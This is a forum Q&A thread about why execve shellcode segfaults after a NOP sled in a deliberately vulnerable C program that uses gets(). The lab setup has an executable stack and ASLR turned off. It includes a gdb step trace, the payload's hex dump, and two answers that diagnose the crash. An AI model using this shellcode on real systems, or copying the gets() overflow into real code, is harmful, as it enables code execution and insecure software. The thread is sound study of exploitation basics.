Reputation: 298
Shellcode segfaults after nop sled
Basic C program with an obvious buffer overflow:
void f(){
char buf[100];
gets(buf);
printf("Hello exploit");
}
int main(){
f();
return 0;
}
Shellcode for the correct system: http://www.shell-storm.org/shellcode/files/shellcode-811.php I've put a NOP sled at the front and the correct return address at the back.
When running the exploit in gdb, I can see that the return address is correctly altered, the execution jumps to my nop sled and continues with the shellcode. I can step through the start of the shellcode, but it segfaults near the end.
(gdb) c
Continuing.
Breakpoint 4, 0xbffff710 in ?? ()
1: x/i $pc
=> 0xbffff710: xor %eax,%eax
(gdb) stepi
0xbffff712 in ?? ()
1: x/i $pc
=> 0xbffff712: push %eax
(gdb) stepi
0xbffff713 in ?? ()
1: x/i $pc
=> 0xbffff713: push $0x68732f2f
(gdb) stepi
0xbffff718 in ?? ()
1: x/i $pc
=> 0xbffff718: push $0x6e69622f
(gdb) stepi
0xbffff71d in ?? ()
1: x/i $pc
=> 0xbffff71d: mov %esp,%ebx
(gdb) stepi
0xbffff71f in ?? ()
1: x/i $pc
=> 0xbffff71f: mov %eax,%ecx
(gdb) stepi
0xbffff721 in ?? ()
1: x/i $pc
=> 0xbffff721: mov %eax,%edx
(gdb) stepi
0xbffff723 in ?? ()
1: x/i $pc
=> 0xbffff723: mov $0x2f,%al
(gdb) stepi
0xbffff725 in ?? ()
1: x/i $pc
=> 0xbffff725: bound %ebp,0x6e(%ecx)
(gdb) stepi
Program received signal SIGSEGV, Segmentation fault.
The program has an executable stack (execstack -s vulnerableApp) and ASLR is off.
So three questions:
- Where does the bound instruction come from? The shellcode from the url doesn't have a bound oppcode
- Why is it segfaulting?
- How can I fix it? (I'd rather understand what's going on here, then trying different shellcodes)
-- Edit I forgot to mention that I've used this shellcode on the same system to exploit a different binary and it worked.
UPDATE
Yes, the shellcode is delivered in its entirety:
0xbffff6f6: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff706: 0x90909090 0x90909090 0xc0319090 0x2f2f6850
0xbffff716: 0x2f686873 0x896e6962 0x89c189e3 0xcd0bb0c2
0xbffff726: 0x40c03180 0xf48680cd 0x8400bfff 0x00000804
0xbffff736: 0x00000000 0x44d30000 0x0001b7e4 0xf7d40000
You can see the sled, followed by the exploit.
Upvotes: 1
Views: 3635
Answers (2)
Reputation: 11
Had the same problem here. Point of the trouble is, that your NOP sled isn't a multiple of 4/8 byte. The instruction "0xc0319090 0x2f2f6850" (NOPs and instructions mixed up) leads to a shift (here a 2 byte shift) in the shellcode until at some point the CPU isn't able to interpret the shellcode, because of an incomplete instruction --> Segmentation Fault
Upvotes: 1
Reputation: 298
I fixed this by adding a small NOP sled after the shellcode. Since the shellcode was added to the stack at the end of the buffer, and it pushes some things to the stack itself, it was overwriting its own code.
Upvotes: 2
Related Questions
- shellcode buffer overflow -SegFault
- Buffer overflow attack, shellcode isn't performed
- Why does my shellcode testing program produce a segfault?
- Verified correct shellcode segfaults when run normally; “No such file” in GDB…?
- Shellcode not executed properly
- return to libc attack using a function pointer
- Can't Reproduce Buffer Overflow Without GDB
- Closed system shellcode experimentation (segfault)
- Exploit causing program to exit with different value inside GDB?
- Runs in gdb but not out of gdb